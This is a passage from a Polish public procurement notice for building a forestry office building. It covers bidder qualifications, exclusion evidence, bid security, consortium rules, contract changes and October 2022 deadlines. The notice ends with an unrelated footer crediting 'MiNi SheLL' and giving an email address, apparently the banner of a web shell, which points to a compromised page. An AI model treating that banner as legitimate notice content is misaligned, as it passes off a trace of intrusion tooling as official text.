„zaprojektuj i wybuduj”,<br/>Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli robota budowlana (bez części obejmującej projekt)<br/>będzie odpowiadała swoim zakresem i wartością warunkowi opisanemu powyżej.<br/>b) warunek dotyczący zdolności technicznej lub zawodowej, w zakresie osób skierowanych przez Wykonawcę do realizacji<br/>zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej<br/>jedną osobą na stanowisko kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanej bez ograniczeń, wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane<br/>(tekst jedn. Dz. U. z 2021 r. poz. 2351 z późn. zm.), lub odpowiadające im ważne uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów, umożliwiające kierowanie budową w zakresie przewidzianym<br/>opisem przedmiotu zamówienia tj. w zakresie budowy budynków,<br/>W stosunku do ww. uprawnienia Zamawiający akceptuje również odpowiadające im uprawnienia wydane w innych<br/>państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz<br/>Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(tekst jedn. Dz. U. z 2021 r., poz. 1646 z późn. zm.), które uprawniają do kierowania robotami budowlanymi w zakresie<br/>przewidzianym opisem przedmiotu zamówienia tj. w zakresie budowy budynków.<br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia, Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych:<br/>a) informacji z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1) i 2) PZP, (b) art. 108 ust. 1 pkt 4) PZP, dotyczącej<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego - sporządzonej nie wcześniej niż 6 miesięcy przed<br/>jej złożeniem,<br/>b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym<br/>Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej -<br/>kapitałowej stanowi załącznik nr 6 do SWZ),<br/>c) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że<br/>przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109<br/>ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek<br/>na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności,<br/>e) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>f) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>(a) art. 108 ust. 1 pkt 3) PZP,<br/>(b) art. 108 ust. 1 pkt 4) PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>(c) art. 108 ust. 1 pkt 5) PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>(d) art. 108 ust. 1 pkt 6) PZP,<br/>(e) art. 109 ust. 1 pkt 1) PZP, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których<br/>mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r. poz. 1170 z późn. zm.),<br/>(f) art. 109 ust. 1 pkt 8) i 10) PZP<br/>- (wzór oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw<br/>wykluczenia z postępowania stanowi załącznik nr 9 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. Zamawiający działając na podstawie art.<br/>274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków<br/>dowodowych, o których mowa w pkt 9.2. lit. a), wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji finansowej.<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (wstecz od dnia w którym upływa termin<br/>składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (wzór wykazu wykonanych robót budowlanych<br/>stanowi załącznik nr 7 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami,<br/>wykaz o którym mowa wyżej dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>c) dowodów określających, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>d) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień (numer oraz zakres<br/>uprawnień zapewniających prawo wykonywania samodzielnych funkcji technicznych w budownictwie, z podaniem daty i pełnej<br/>nazwy i pełnej podstawy prawnej ich wydania) niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu osób skierowanych przez<br/>wykonawcę do realizacji zamówienia stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w pkt 6.1. - 6.3. SWZ oraz w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. SWZ Wykonawca składa wraz z<br/>ofertą oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj.<br/>- oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone zgodnie ze wzorem stanowiącym załącznik nr<br/>3A do SWZ oraz<br/>- oświadczenie o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem stanowiącym załącznik nr 3B do SWZ. W<br/>terminie składania ofert określonym w pkt 14.1. SWZ wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę<br/>zawierającą:<br/>a) formularz Oferty (sporządzony wg wzoru stanowiącego załącznik nr 2 do SWZ) sporządzony pod rygorem nieważności, w<br/>formie elektronicznej<br/>b) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 3A i załącznik nr 3B do SWZ,<br/>pod rygorem nieważności, w formie elektronicznej, złożone przez:<br/>- Wykonawcę,<br/>- każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile ofertę składają wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia),<br/>c) w przypadku powołania się na zasoby podmiotów trzecich - oświadczenia, sporządzone zgodnie ze wzorami<br/>stanowiącymi odpowiednio załącznik nr 3C i załącznik nr 3D do SWZ, pod rygorem nieważności, w formie elektronicznej<br/>d) w przypadku powołania się na zasoby podmiotów trzecich - zobowiązanie podmiotu udostępniającego zasoby do oddania<br/>Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie<br/>z pkt 9.4. SWZ, jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub<br/>sytuacji innych podmiotów; (Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby wykonania zamówienia stanowi załącznik nr 5 do SWZ),<br/>e) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy/podmiotu udostępniającego<br/>zasoby na zasadach określonych w art. 118 PZP, jest umocowana do jego reprezentowania. Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca/podmiot udostępniający zasoby dostarczy dane<br/>umożliwiające dostęp do tych dokumentów,<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy/podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 PZP, jeżeli w imieniu Wykonawcy/podmiotu<br/>udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z innych dokumentów<br/>złożonych wraz z ofertą<br/>g) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia, sporządzone pod rygorem nieważności, w postaci elektronicznej i opatrzonej kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym lub w formie opisanej w pkt 9.18 – 9.20. SWZ,<br/>h) oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które roboty budowlane wykonają poszczególni<br/>Wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>i) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych<br/>do jego wystawienia (tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości 4.500 zł (słownie: cztery tysiące pięćset złotych).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>2.Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku PKO BP O/Międzychód nr rachunku: 21 10204144 0000 6002 0043 3250 z dopiskiem: wadium na zabezpieczenie oferty w<br/>postępowaniu na „Budowę budynku biurowego - kancelarii leśnictw Sowia Góra i Kamień”. Wniesienie wadium w pieniądzu<br/>będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium<br/>wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>7.Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu<br/>(wg wzoru stanowiącego załącznik nr 3A do SWZ) oraz oświadczenie o braku podstaw do wykluczenia (wg wzoru<br/>stanowiącego załącznik nr 3B do SWZ) składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej<br/>(tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>W związku z powyższym na podstawie art. 117 ust. 4 PZP Wykonawca jest zobowiązany załączyć do oferty podmiotowy<br/>środek dowodowy w postaci oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>Wzór stosownego oświadczenia został zawarty w formularzu Oferty stanowiącym załącznik nr 2 do SWZ i Zamawiający<br/>zaleca złożyć to oświadczenie właśnie w tym formularzu.<br/>Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się również do wykonawców,<br/>prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający na podstawie art 455 ust. 1 pkt 1 PZP, przewiduje możliwość dokonania następujących zmian Umowy:<br/>(1) w zakresie zmiany terminów realizacji poszczególnych robót określonych Harmonogramie oraz Terminu Wykonania,<br/>stosownie do przypadku:<br/>(a) o czas opóźnienia Zamawiającego w wykonywaniu jego obowiązków wynikających z Umowy,<br/>(b) o czas działania Siły Wyższej oraz o czas niezbędny do usunięcia jej skutków i następstw,<br/>(c) w przypadku zmiany powszechnie obowiązujących przepisów prawa, regulujących zasady wykonywania Przedmiotu<br/>Umowy,<br/>(d) o czas opóźnienia w wykonaniu przez podmioty zewnętrzne czynności koniecznych do wykonania Przedmiotu Umowy,<br/>(e) o czas, kiedy realizacja Przedmiotu Umowy była niemożliwa oraz następstw tego zdarzenia w przypadku napotkania<br/>przez Wykonawcę lub Zamawiającego okoliczności niemożliwych do przewidzenia i niezależnych od nich,<br/>(f) o czas niezbędny do wykonania czynności wynikających z zaleceń właściwych organów,<br/>g) o czas wynikający z konieczności ewentualnej zmiany zakresu Przedmiotu Umowy wprowadzonej na podstawie<br/>przepisów PZP umożliwiających dokonanie takiej zmiany,<br/>- przy czym każda zmiana może nastąpić tylko o czas niezbędny do wykonania Przedmiotu Umowy lub jego części, nie<br/>dłużej jednak niż o okres trwania okoliczności będących podstawą zmiany oraz ich następstw.<br/>(2) w zakresie zmiany kolejności wykonywania lub zmiany terminów wykonania poszczególnych świadczeń wchodzących w<br/>skład Przedmiotu Umowy w stosunku do terminów określonych w Harmonogramie, jednakże bez dokonywania zmiany<br/>Terminu Wykonania. Przedmiotowa zmiana będzie mogła być wprowadzona w szczególności w przypadku zaistnienia<br/>okoliczności wskazanych w pkt (1).<br/>(3) w zakresie zmiany sposobu wykonania Przedmiotu Umowy związanej z koniecznością zrealizowania Przedmiotu Umowy<br/>przy zastosowaniu innych rozwiązań technicznych lub technologicznych, w szczególności robót zamiennych, gdy wystąpi co<br/>najmniej jedna z okoliczności:<br/>(a) wystąpi zmiana prawa mająca wpływ na realizację Przedmiotu Umowy,<br/>(b) w sytuacji, gdyby zastosowanie przewidzianych pierwotnie rozwiązań groziło niewykonaniem lub wadliwym wykonaniem<br/>Przedmiotu Umowy,<br/>(c) w przypadku, gdy na rynku pojawią się nowsze zamienniki zaoferowanych elementów Przedmiotu Umowy a uzyskanie<br/>elementów zaoferowanych przez Wykonawcę będzie bardzo utrudnione,<br/>(d) jak również w przypadku wystąpienia okoliczności, o których mowa w pkt (1) i (2) powyżej,<br/>- z zastrzeżeniem, że inne rozwiązania techniczne będą spełniały wymagania funkcjonalne określone w Dokumentacji<br/>Projektowej w stopniu nie mniejszym niż rozwiązania dotychczasowe.<br/>(4) W zakresie zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa w pkt (3) będą miały wpływ na koszty<br/>wykonania Przedmiotu Umowy przez Wykonawcę. Ustalenie zmienionej kwoty Wynagrodzenia odbywać się będzie na<br/>zasadach szczegółowo opisanych we wzorze umowy<br/>będącym załącznikiem do SWZ.<br/>2. Inicjatorem zmian w Umowie może być każda ze Stron, z tym, że ostateczna decyzja, co do wprowadzenia zmian i ich<br/>zakresu należy do Zamawiającego. Wystąpienie którejkolwiek z okoliczności mogących powodować zmianę umowy, nie<br/>stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian, ani nie może stanowić podstawy do<br/>jakichkolwiek roszczeń Wykonawcy do ich dokonania.<br/>3. Niezależnie od postanowień niniejszego paragrafu, Strony dopuszczają możliwość (i) zmian redakcyjnych Umowy oraz (ii)<br/>zmian danych Stron ujawnionych w rejestrach publicznych, nie stanowiących zmiany, o której mowa w art. 455 ust. 1 PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy (SmartPZP) https://portal.smartpzp.pl/nadlesnictwo_miedzychod</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio, z zastrzeżeniem, że do<br/>odpowiedzi na wezwanie Zamawiającego do złożenia dokumentów, o którym mowa w pkt 9.3. należy załączyć (1)<br/>zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem<br/>podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów<br/>potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności, oraz (2) zaświadczenie<br/>albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego<br/>oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że<br/>Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP,<br/>wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na<br/>ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek<br/>na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie<br/>spłat tych należności - odrębnie dla każdego ze wspólników oraz odrębnie dla spółki.

Creat By MiNi SheLL
Email: jattceo@gmail.com